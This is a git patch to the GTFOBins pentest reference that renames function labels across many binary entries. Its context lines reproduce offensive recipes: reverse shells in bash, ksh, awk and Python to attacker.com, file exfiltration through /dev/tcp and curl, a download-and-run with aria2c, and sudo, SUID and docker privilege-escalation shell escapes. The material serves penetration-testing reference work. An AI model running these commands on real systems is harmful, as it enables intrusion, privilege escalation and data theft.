From dd337b5ddfdfcde1032f9ff46ec76da04f052f67 Mon Sep 17 00:00:00 2001 
From: Emilio Pinna
Date: Fri, 5 Oct 2018 18:55:38 +0100
Subject: [PATCH] Adopt new function names
---
_data/functions.yml | 12 ++++++------ _gtfobins/apt-get.md | 4 ++-- _gtfobins/apt.md | 4 ++-- _gtfobins/aria2c.md | 6 +++--- _gtfobins/ash.md | 6 +++--- _gtfobins/awk.md | 10 +++++----- _gtfobins/base64.md | 4 ++-- _gtfobins/bash.md | 12 ++++++------ _gtfobins/busybox.md | 8 ++++---- _gtfobins/cat.md | 4 ++-- _gtfobins/chmod.md | 4 ++-- _gtfobins/chown.md | 4 ++-- _gtfobins/cp.md | 4 ++-- _gtfobins/cpulimit.md | 4 ++-- _gtfobins/crontab.md | 4 ++-- _gtfobins/csh.md | 6 +++--- _gtfobins/curl.md | 8 ++++---- _gtfobins/cut.md | 4 ++-- _gtfobins/dash.md | 6 +++--- _gtfobins/date.md | 4 ++-- _gtfobins/dd.md | 4 ++-- _gtfobins/diff.md | 4 ++-- _gtfobins/docker.md | 4 ++-- _gtfobins/easy_install.md | 12 ++++++------ _gtfobins/ed.md | 6 +++--- _gtfobins/emacs.md | 6 +++--- _gtfobins/env.md | 6 +++--- _gtfobins/expand.md | 4 ++-- _gtfobins/expect.md | 6 +++--- _gtfobins/facter.md | 4 ++-- _gtfobins/find.md | 6 +++--- _gtfobins/finger.md | 4 ++-- _gtfobins/flock.md | 6 +++--- _gtfobins/fmt.md | 4 ++-- _gtfobins/fold.md | 4 ++-- _gtfobins/ftp.md | 8 ++++---- _gtfobins/gdb.md | 14 +++++++------- _gtfobins/git.md | 6 +++--- _gtfobins/grep.md | 4 ++-- _gtfobins/head.md | 4 ++-- _gtfobins/ionice.md | 6 +++--- _gtfobins/journalctl.md | 4 ++-- _gtfobins/jq.md | 4 ++-- _gtfobins/ksh.md | 12 ++++++------ _gtfobins/ld.so.md | 6 +++--- _gtfobins/less.md | 6 +++--- _gtfobins/ltrace.md | 4 ++-- _gtfobins/lua.md | 14 +++++++------- _gtfobins/mail.md | 4 ++-- _gtfobins/make.md | 6 +++--- _gtfobins/man.md | 6 +++--- _gtfobins/more.md | 6 +++--- _gtfobins/mount.md | 2 +- _gtfobins/mv.md | 4 ++-- _gtfobins/mysql.md | 6 +++--- _gtfobins/nano.md | 6 +++--- _gtfobins/nc.md | 12 ++++++------ _gtfobins/nice.md | 6 +++--- _gtfobins/nl.md | 4 ++-- _gtfobins/nmap.md | 14 +++++++------- _gtfobins/node.md | 12 ++++++------ _gtfobins/od.md | 4 ++-- _gtfobins/perl.md | 10 +++++----- _gtfobins/pg.md | 6
+++--- _gtfobins/php.md | 16 ++++++++-------- _gtfobins/pico.md | 6 +++--- _gtfobins/pip.md | 12 ++++++------ _gtfobins/puppet.md | 4 ++-- _gtfobins/python.md | 16 ++++++++-------- _gtfobins/rlwrap.md | 6 +++--- _gtfobins/rpm.md | 6 +++--- _gtfobins/rpmquery.md | 6 +++--- _gtfobins/rsync.md | 6 +++--- _gtfobins/ruby.md | 14 +++++++------- _gtfobins/scp.md | 10 +++++----- _gtfobins/sed.md | 8 ++++---- _gtfobins/setarch.md | 6 +++--- _gtfobins/sftp.md | 8 ++++---- _gtfobins/shuf.md | 4 ++-- _gtfobins/smbclient.md | 4 ++-- _gtfobins/socat.md | 8 ++++---- _gtfobins/sort.md | 4 ++-- _gtfobins/sqlite3.md | 6 +++--- _gtfobins/ssh.md | 8 ++++---- _gtfobins/stdbuf.md | 6 +++--- _gtfobins/strace.md | 6 +++--- _gtfobins/tail.md | 4 ++-- _gtfobins/tar.md | 8 ++++---- _gtfobins/taskset.md | 6 +++--- _gtfobins/tclsh.md | 8 ++++---- _gtfobins/tcpdump.md | 4 ++-- _gtfobins/tee.md | 4 ++-- _gtfobins/telnet.md | 8 ++++---- _gtfobins/tftp.md | 8 ++++---- _gtfobins/time.md | 6 +++--- _gtfobins/timeout.md | 6 +++--- _gtfobins/ul.md | 4 ++-- _gtfobins/unexpand.md | 4 ++-- _gtfobins/uniq.md | 4 ++-- _gtfobins/unshare.md | 6 +++--- _gtfobins/vi.md | 6 +++--- _gtfobins/vim.md | 6 +++--- _gtfobins/watch.md | 8 ++++---- _gtfobins/wget.md | 8 ++++---- _gtfobins/whois.md | 4 ++-- _gtfobins/wish.md | 6 +++--- _gtfobins/xargs.md | 6 +++--- _gtfobins/xxd.md | 4 ++-- _gtfobins/zip.md | 6 +++--- _gtfobins/zsh.md | 6 +++--- 110 files changed, 354 insertions(+), 354 deletions(-)
diff --git a/_data/functions.yml b/_data/functions.yml
index 444bab9..e38449e 100644
--- a/_data/functions.yml
+++ b/_data/functions.yml
@@ -4,13 +4,13 @@ shell: label: Shell description: | - It can be used to break out from restricted environments by spawning an + It can be used to break out from restricted environments by spawning an interactive system shell. command: label: Command description: | - It can be used to break out from restricted environments by running + It can be used to break out from restricted environments by running non-interactive system commands. reverse-shell:
@@ -19,8 +19,8 @@ reverse-shell: It can send back a reverse shell to a listening attacker to open a remote network access. -reverse-non-interactive-shell: - label: Reverse non-interactive shell +non-interactive-reverse-shell: + label: Non-interactive reverse shell description: | It can send back a non-interactive reverse shell to a listening attacker to open a remote network access.
@@ -30,8 +30,8 @@ bind-shell: description: | It can bind a shell to a local port to allow remote network access. -bind-non-interactive-shell: - label: Bind non-interactive shell +non-interactive-bind-shell: + label: Non-interactive bind shell description: | It can bind a non-interactive shell to a local port to allow remote network access.
diff --git a/_gtfobins/apt-get.md b/_gtfobins/apt-get.md
index 096e0c3..c4b035d 100644
--- a/_gtfobins/apt-get.md
+++ b/_gtfobins/apt-get.md
@@ -1,11 +1,11 @@ --- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. functions: - execute-interactive: + shell: - code: | apt-get changelog apt !/bin/sh - sudo-enabled: + sudo: - code: | sudo apt-get changelog apt !/bin/sh
diff --git a/_gtfobins/apt.md b/_gtfobins/apt.md
index 096e0c3..c4b035d 100644
--- a/_gtfobins/apt.md
+++ b/_gtfobins/apt.md
@@ -1,11 +1,11 @@ --- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. functions: - execute-interactive: + shell: - code: | apt-get changelog apt !/bin/sh - sudo-enabled: + sudo: - code: | sudo apt-get changelog apt !/bin/sh
diff --git a/_gtfobins/aria2c.md b/_gtfobins/aria2c.md
index eeda286..d9fc451 100644
--- a/_gtfobins/aria2c.md
+++ b/_gtfobins/aria2c.md
@@ -1,7 +1,7 @@ --- description: Note that the subprocess is immediately sent to the background. functions: - execute-non-interactive: + command: - code: | COMMAND='id' TF=$(mktemp)
@@ -10,14 +10,14 @@ functions: aria2c --on-download-error=$TF http://x - description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID. code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa - suid-enabled: + suid: - code: | COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF ./aria2c --on-download-error=$TF http://x - sudo-enabled: + sudo: - code: | COMMAND='id' TF=$(mktemp)
diff --git a/_gtfobins/ash.md b/_gtfobins/ash.md
index aee72f4..287745a 100644
--- a/_gtfobins/ash.md
+++ b/_gtfobins/ash.md
@@ -1,13 +1,13 @@ --- functions: - execute-interactive: + shell: - code: ash file-write: - code: | export LFILE=file_to_write ash -c 'echo DATA > $LFILE' - suid-enabled: + suid: - code: "./ash" - sudo-enabled: + sudo: - code: sudo ash ---
diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md
index 08816ab..a131e09 100644
--- a/_gtfobins/awk.md
+++ b/_gtfobins/awk.md
@@ -1,8 +1,8 @@ --- functions: - execute-interactive: + shell: - code: awk 'BEGIN {system("/bin/sh")}' - reverse-shell-non-interactive: + non-interactive-reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | RHOST=attacker.com
@@ -11,7 +11,7 @@ functions: s = "/inet/tcp/0/" RHOST "/" RPORT; while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' - bind-shell-non-interactive: + non-interactive-bind-shell: - description: Run `nc target.com 12345` on the attacker box to connect to the shell. code: | LPORT=12345
@@ -27,8 +27,8 @@ functions: - code: | LFILE=file_to_read awk '//' "$LFILE" - sudo-enabled: + sudo: - code: sudo awk 'BEGIN {system("/bin/sh")}' - suid-limited: + limited-suid: - code: ./awk 'BEGIN {system("/bin/sh")}' ---
diff --git a/_gtfobins/base64.md b/_gtfobins/base64.md
index 0148a42..de9f950 100644
--- a/_gtfobins/base64.md
+++ b/_gtfobins/base64.md
@@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read base64 "$LFILE" | base64 --decode - suid-enabled: + suid: - code: | LFILE=file_to_read ./base64 "$LFILE" | base64 --decode - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo base64 "$LFILE" | base64 --decode
diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md
index bff48d9..92a69b2 100644
--- a/_gtfobins/bash.md
+++ b/_gtfobins/bash.md
@@ -1,14 +1,14 @@ --- functions: - execute-interactive: + shell: - code: bash - reverse-shell-interactive: + reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1' - upload: + file-upload: - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | export RHOST=attacker.com
@@ -21,7 +21,7 @@ functions: export RPORT=12345 export LFILE=file_to_send bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' - download: + file-download: - description: Fetch a remote file via HTTP GET request. code: | export RHOST=attacker.com
@@ -58,8 +58,8 @@ functions: HISTTIMEFORMAT=$'\r\e[K' history -r $LFILE history - suid-enabled: + suid: - code: "./bash -p" - sudo-enabled: + sudo: - code: sudo bash ---
diff --git a/_gtfobins/busybox.md b/_gtfobins/busybox.md
index c6aab47..9e01c7a 100644
--- a/_gtfobins/busybox.md
+++ b/_gtfobins/busybox.md
@@ -1,9 +1,9 @@ --- description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example. functions: - execute-interactive: + shell: - code: busybox sh - upload: + file-upload: - description: Serve files in the local folder running an HTTP server. code: | export LPORT=12345
@@ -16,9 +16,9 @@ functions: - code: | LFILE=file_to_read ./busybox cat "$LFILE" - suid-enabled: + suid: - description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration. code: "./busybox sh" - sudo-enabled: + sudo: - code: sudo busybox sh ---
diff --git a/_gtfobins/cat.md b/_gtfobins/cat.md
index 3781ffa..dfd6563 100644
--- a/_gtfobins/cat.md
+++ b/_gtfobins/cat.md
@@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read cat "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./cat "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo cat "$LFILE"
diff --git a/_gtfobins/chmod.md b/_gtfobins/chmod.md
index f61b194..61e3361 100644
--- a/_gtfobins/chmod.md
+++ b/_gtfobins/chmod.md
@@ -1,11 +1,11 @@ --- description: This can be run with elevated privileges to change permissions and then read, write, or execute a file. functions: - suid-enabled: + suid: - code: | LFILE=file_to_change ./chmod 0777 $LFILE - sudo-enabled: + sudo: - code: | LFILE=file_to_change sudo chmod 0777 $LFILE
diff --git a/_gtfobins/chown.md b/_gtfobins/chown.md
index 0414645..3e2eab4 100644
--- a/_gtfobins/chown.md
+++ b/_gtfobins/chown.md
@@ -1,11 +1,11 @@ --- description: This can be run with elevated privileges to change ownership and then read, write, or execute a file. functions: - suid-enabled: + suid: - code: | LFILE=file_to_change ./chown $(id -un):$(id -gn) $LFILE - sudo-enabled: + sudo: - code: | LFILE=file_to_change sudo chown $(id -un):$(id -gn) $LFILE
diff --git a/_gtfobins/cp.md b/_gtfobins/cp.md
index ba101cf..f1dfb2e 100644
--- a/_gtfobins/cp.md
+++ b/_gtfobins/cp.md
@@ -1,13 +1,13 @@ --- description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. functions: - suid-enabled: + suid: - code: | LFILE=file_to_write TF=$(mktemp) echo "DATA" > $TF ./cp $TF $LFILE - sudo-enabled: + sudo: - code: | LFILE=file_to_write TF=$(mktemp)
diff --git a/_gtfobins/cpulimit.md b/_gtfobins/cpulimit.md
index 9ad7a95..2bf19b6 100644
--- a/_gtfobins/cpulimit.md
+++ b/_gtfobins/cpulimit.md
@@ -1,7 +1,7 @@ --- functions: - execute-interactive: + shell: - code: cpulimit -l 100 -f /bin/sh - sudo-enabled: + sudo: - code: sudo cpulimit -l 100 -f /bin/sh ---
diff --git a/_gtfobins/crontab.md b/_gtfobins/crontab.md
index 6ec198c..2f1439a 100644
--- a/_gtfobins/crontab.md
+++ b/_gtfobins/crontab.md
@@ -1,9 +1,9 @@ --- functions: - execute-non-interactive: + command: - description: The commands are executed according to the crontab file edited via the `crontab` utility. code: crontab -e - sudo-enabled: + sudo: - description: The commands are executed according to the crontab file edited via the `crontab` utility. code: sudo crontab -e ---
diff --git a/_gtfobins/csh.md b/_gtfobins/csh.md
index 3c161bf..908d053 100644
--- a/_gtfobins/csh.md
+++ b/_gtfobins/csh.md
@@ -1,13 +1,13 @@ --- functions: - execute-interactive: + shell: - code: csh file-write: - code: | export LFILE=file_to_write ash -c 'echo DATA > $LFILE' - suid-enabled: + suid: - code: "./csh -b" - sudo-enabled: + sudo: - code: sudo csh ---
diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md
index 8d3dacc..3c7db92 100644
--- a/_gtfobins/curl.md
+++ b/_gtfobins/curl.md
@@ -1,12 +1,12 @@ --- functions: - upload: + file-upload: - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data. code: | URL=http://attacker.com/ LFILE=file_to_send curl -X POST -d @$file_to_send $URL - download: + file-download: - description: Fetch a remote file via HTTP GET request. code: | URL=http://attacker.com/file_to_get
@@ -17,13 +17,13 @@ functions: code: | LFILE=/tmp/file_to_read curl file://$LFILE - suid-enabled: + suid: - description: Fetch a remote file via HTTP GET request. code: | URL=http://attacker.com/file_to_get LFILE=file_to_save ./curl $URL -o $LFILE - sudo-enabled: + sudo: - description: Fetch a remote file via HTTP GET request. code: | URL=http://attacker.com/file_to_get
diff --git a/_gtfobins/cut.md b/_gtfobins/cut.md
index c9afd76..d677d15 100644
--- a/_gtfobins/cut.md
+++ b/_gtfobins/cut.md
@@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read cut -d "" -f1 "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./cut -d "" -f1 "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo cut -d "" -f1 "$LFILE"
diff --git a/_gtfobins/dash.md b/_gtfobins/dash.md
index 42facb4..d6bf7c9 100644
--- a/_gtfobins/dash.md
+++ b/_gtfobins/dash.md
@@ -1,13 +1,13 @@ --- functions: - execute-interactive: + shell: - code: dash file-write: - code: | export LFILE=file_to_write ash -c 'echo DATA > $LFILE' - suid-enabled: + suid: - code: ./dash -p - sudo-enabled: + sudo: - code: sudo dash ---
diff --git a/_gtfobins/date.md b/_gtfobins/date.md
index 312ce07..a5604c2 100644
--- a/_gtfobins/date.md
+++ b/_gtfobins/date.md
@@ -8,11 +8,11 @@ functions: - code: | LFILE=file_to_read date -f $LFILE - suid-enabled: + suid: - code: | LFILE=file_to_read ./date -f $LFILE - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo date -f $LFILE
diff --git a/_gtfobins/dd.md b/_gtfobins/dd.md
index 79dfa97..fc02176 100644
--- a/_gtfobins/dd.md
+++ b/_gtfobins/dd.md
@@ -8,11 +8,11 @@ functions: - code: | LFILE=file_to_read dd if=LFILE - suid-enabled: + suid: - code: | LFILE=file_to_write echo "data" | ./dd of=$LFILE - sudo-enabled: + sudo: - code: | LFILE=file_to_write echo "data" | sudo -E dd of=$LFILE
diff --git a/_gtfobins/diff.md b/_gtfobins/diff.md
index 6e24b86..ab33d2f 100644
--- a/_gtfobins/diff.md
+++ b/_gtfobins/diff.md
@@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read diff --line-format=%L /dev/null $LFILE - suid-enabled: + suid: - code: | LFILE=file_to_read ./diff --line-format=%L /dev/null $LFILE - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo diff --line-format=%L /dev/null $LFILE
diff --git a/_gtfobins/docker.md b/_gtfobins/docker.md
index eae6a36..448c422 100644
--- a/_gtfobins/docker.md
+++ b/_gtfobins/docker.md
@@ -2,11 +2,11 @@ description: | Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, e.g. being in the `docker` group. Any other Docker Linux image should work, e.g., `debian`. functions: - sudo-enabled: + sudo: - code: | sudo docker run --rm -v /home/$USER:/h_docs ubuntu \ sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p - suid-enabled: + suid: - code: | ./docker run --rm -v /home/$USER:/h_docs ubuntu \ sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
diff --git a/_gtfobins/easy_install.md b/_gtfobins/easy_install.md
index db43b38..c144e66 100644
--- a/_gtfobins/easy_install.md
+++ b/_gtfobins/easy_install.md
@@ -1,11 +1,11 @@ --- functions: - execute-interactive: + shell: - code: | TF=$(mktemp -d) echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py easy_install $TF - reverse-shell-interactive: + reverse-shell: - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | export RHOST=attacker.com
@@ -16,7 +16,7 @@ functions: [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")' > $TF/setup.py easy_install $TF - upload: + file-upload: - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | export URL=http://attacker.com/
@@ -36,7 +36,7 @@ functions: else: import SimpleHTTPServer as s, SocketServer as ss ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py easy_install $TF - download: + file-download: - description: Fetch a remote file via HTTP GET request. The file path must be absolute. code: | export URL=http://attacker.com/file_to_get
@@ -62,12 +62,12 @@ functions: TF=$(mktemp -d) echo 'print(open("file_to_read").read())' > $TF/setup.py easy_install $TF - load-library: + library-load: - code: | TF=$(mktemp -d) echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py easy_install $TF - sudo-enabled: + sudo: - code: | TF=$(mktemp -d) echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md
index 8ef61c9..29735e9 100644
--- a/_gtfobins/ed.md
+++ b/_gtfobins/ed.md
@@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: | ed !/bin/sh
@@ -17,11 +17,11 @@ functions: ed file_to_read ,p q - sudo-enabled: + sudo: - code: | sudo ed !/bin/sh - suid-limited: + limited-suid: - code: | ./ed !/bin/sh
diff --git a/_gtfobins/emacs.md b/_gtfobins/emacs.md
index d04ba61..2ff2d03 100644
--- a/_gtfobins/emacs.md
+++ b/_gtfobins/emacs.md
@@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: emacs -Q -nw --eval '(term "/bin/sh")' file-write: - code: |
@@ -9,8 +9,8 @@ functions: C-x C-s file-read: - code: emacs file_to_read - suid-enabled: + suid: - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")' - sudo-enabled: + sudo: - code: sudo emacs -Q -nw --eval '(term "/bin/sh")' ---
diff --git a/_gtfobins/env.md b/_gtfobins/env.md
index 0dc5e64..e5d16dd 100644
--- a/_gtfobins/env.md
+++ b/_gtfobins/env.md
@@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: env /bin/sh - suid-enabled: + suid: - code: ./env /bin/sh -p - sudo-enabled: + sudo: - code: sudo env /bin/sh ---
diff --git a/_gtfobins/expand.md b/_gtfobins/expand.md
index 3c00ddf..74a87ea 100644
--- a/_gtfobins/expand.md
+++ b/_gtfobins/expand.md
@@ -5,11 +5,11 @@ functions: - code: | LFILE=file_to_read expand "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./expand "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo expand "$LFILE"
diff --git a/_gtfobins/expect.md b/_gtfobins/expect.md
index 541aa47..ddbb7e7 100644
--- a/_gtfobins/expect.md
+++ b/_gtfobins/expect.md
@@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: expect -c 'spawn /bin/sh;interact' - suid-enabled: + suid: - code: ./expect -c 'spawn /bin/sh -p;interact' - sudo-enabled: + sudo: - code: sudo expect -c 'spawn /bin/sh;interact' ---
diff --git a/_gtfobins/facter.md b/_gtfobins/facter.md
index bce0db0..2dab660 100644
--- a/_gtfobins/facter.md
+++ b/_gtfobins/facter.md
@@ -1,11 +1,11 @@ --- functions: - execute-interactive: + shell: - code: | TF=$(mktemp -d) echo 'exec("/bin/sh")' > $TF/x.rb FACTERLIB=$TF facter - sudo-enabled: + sudo: - code: | TF=$(mktemp -d) echo 'exec("/bin/sh")' > $TF/x.rb
diff --git a/_gtfobins/find.md b/_gtfobins/find.md
index bb85e04..350f12a 100644
--- a/_gtfobins/find.md
+++ b/_gtfobins/find.md
@@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: find . -exec /bin/sh \; -quit - suid-enabled: + suid: - code: ./find . -exec /bin/sh -p \; -quit - sudo-enabled: + sudo: - code: sudo find . -exec /bin/sh \; -quit ---
diff --git a/_gtfobins/finger.md b/_gtfobins/finger.md
index 10079df..c3fa743 100644
--- a/_gtfobins/finger.md
+++ b/_gtfobins/finger.md
@@ -2,13 +2,13 @@ description: | `finger` hangs waiting for the remote peer to close the socket. functions: - upload: + file-upload: - description: Send a binary file to a TCP port. Run `sudo nc -l -p 79 | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments. code: | RHOST=attacker.com LFILE=file_to_send finger "$(base64 $LFILE)@$RHOST" - download: + file-download: - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | sudo nc -l -p 79` on the attacker box to send the file. code: | RHOST=attacker.com
diff --git a/_gtfobins/flock.md b/_gtfobins/flock.md
index 22c0937..1909cd0 100644
--- a/_gtfobins/flock.md
+++ b/_gtfobins/flock.md
@@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: flock -u / /bin/sh - suid-enabled: + suid: - code: ./flock -u / /bin/sh -p - sudo-enabled: + sudo: - code: sudo flock -u / /bin/sh ---
diff --git a/_gtfobins/fmt.md b/_gtfobins/fmt.md
index 88f783d..3061c48 100644
--- a/_gtfobins/fmt.md
+++ b/_gtfobins/fmt.md
@@ -5,11 +5,11 @@ functions: - code: | LFILE=file_to_read fmt -pNON_EXISTING_PREFIX "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./fmt -pNON_EXISTING_PREFIX "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
diff --git a/_gtfobins/fold.md b/_gtfobins/fold.md
index e05e3e4..fc53f3a 100644
--- a/_gtfobins/fold.md
+++ b/_gtfobins/fold.md
@@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read fold -w99999999 "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./fold -w99999999 "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo fold -w99999999 "$LFILE"
diff --git a/_gtfobins/ftp.md b/_gtfobins/ftp.md
index 3a522dc..5d177a6 100644
--- a/_gtfobins/ftp.md
+++ b/_gtfobins/ftp.md
@@ -1,22 +1,22 @@ --- functions: - execute-interactive: + shell: - code: | ftp !/bin/sh - upload: + file-upload: - description: Send local file to a FTP server. code: | RHOST=attacker.com ftp $RHOST put file_to_send - download: + file-download: - description: Fetch a remote file from a FTP server. code: | RHOST=attacker.com ftp $RHOST get file_to_get - sudo-enabled: + sudo: - code: | sudo ftp !/bin/sh
diff --git a/_gtfobins/gdb.md b/_gtfobins/gdb.md
index c5dfc4e..68676d3 100644
--- a/_gtfobins/gdb.md
+++ b/_gtfobins/gdb.md
@@ -1,8 +1,8 @@ --- functions: - execute-interactive: + shell: - code: gdb -nx -ex '!sh' -ex quit - reverse-shell-interactive: + reverse-shell: - description: This requires that GDB is compiled with Python support. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | export RHOST=attacker.com
@@ -11,7 +11,7 @@ functions: s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")' -ex quit - upload: + file-upload: - description: This requires that GDB is compiled with Python support. Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | export URL=http://attacker.com/
@@ -27,7 +27,7 @@ functions: if sys.version_info.major == 3: import http.server as s, socketserver as ss else: import SimpleHTTPServer as s, SocketServer as ss ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit - download: + file-download: - description: This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get
@@ -44,12 +44,12 @@ functions: file-read: - description: This requires that GDB is compiled with Python support. code: gdb -nx -ex 'python print(open("file_to_read").read())' -ex quit - load-library: + library-load: - description: This requires that GDB is compiled with Python support. code: gdb -nx -ex 'python from ctypes import cdll; cdll.LoadLibrary("lib.so")' -ex quit - sudo-enabled: + sudo: - code: sudo gdb -nx -ex '!sh' -ex quit - capabilities-enabled: + capabilities: - description: This requires that GDB is compiled with Python support. code: ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit ---
diff --git a/_gtfobins/git.md b/_gtfobins/git.md
index b6b82ad..e9769ac 100644
--- a/_gtfobins/git.md
+++ b/_gtfobins/git.md
@@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: PAGER='sh -c "exec sh 0<&1"' git -p help - sudo-enabled: + sudo: - code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help - suid-limited: + limited-suid: - code: PAGER='sh -c "exec sh 0<&1"' ./git -p help ---
diff --git a/_gtfobins/grep.md b/_gtfobins/grep.md
index 468c404..4a274c9 100644
--- a/_gtfobins/grep.md
+++ b/_gtfobins/grep.md
@@ -6,11 +6,11 @@ functions: - code: | LFILE=file_to_read grep '' $LFILE - suid-enabled: + suid: - code: | LFILE=file_to_read ./grep '' $LFILE - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo grep '' $LFILE
diff --git a/_gtfobins/head.md b/_gtfobins/head.md
index 68f282f..d709e4c 100644
--- a/_gtfobins/head.md
+++ b/_gtfobins/head.md
@@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read head -c1G "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./head -c1G "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo head -c1G "$LFILE"
diff --git a/_gtfobins/ionice.md b/_gtfobins/ionice.md
index 9597bea..eed0bae 100644
--- a/_gtfobins/ionice.md
+++ b/_gtfobins/ionice.md
@@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: ionice /bin/sh - suid-enabled: + suid: - code: ./ionice /bin/sh -p - sudo-enabled: + sudo: - code: sudo ionice /bin/sh ---
diff --git a/_gtfobins/journalctl.md b/_gtfobins/journalctl.md
index 53d531a..476417f 100644
--- a/_gtfobins/journalctl.md
+++ b/_gtfobins/journalctl.md
@@ -4,11 +4,11 @@ description: | This might not work if run by unprivileged users depending on the system configuration. functions: - execute-interactive: + shell: - code: | journalctl !/bin/sh - sudo-enabled: + sudo: - code: | sudo journalctl !/bin/sh
diff --git a/_gtfobins/jq.md b/_gtfobins/jq.md
index 87989ad..bf23af6 100644
--- a/_gtfobins/jq.md
+++ b/_gtfobins/jq.md
@@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read jq -Rr . "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./jq -Rr . "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo jq -Rr . "$LFILE"
diff --git a/_gtfobins/ksh.md b/_gtfobins/ksh.md
index a16514e..2708705 100644
--- a/_gtfobins/ksh.md
+++ b/_gtfobins/ksh.md
@@ -1,14 +1,14 @@ --- functions: - execute-interactive: + shell: - code: ksh - reverse-shell-interactive: + reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1' - upload: + file-upload: - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | export RHOST=attacker.com
@@ -21,7 +21,7 @@ functions: export RPORT=12345 export LFILE=file_to_send ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' - download: + file-download: - description: Fetch a remote file via HTTP GET request. code: | export RHOST=attacker.com
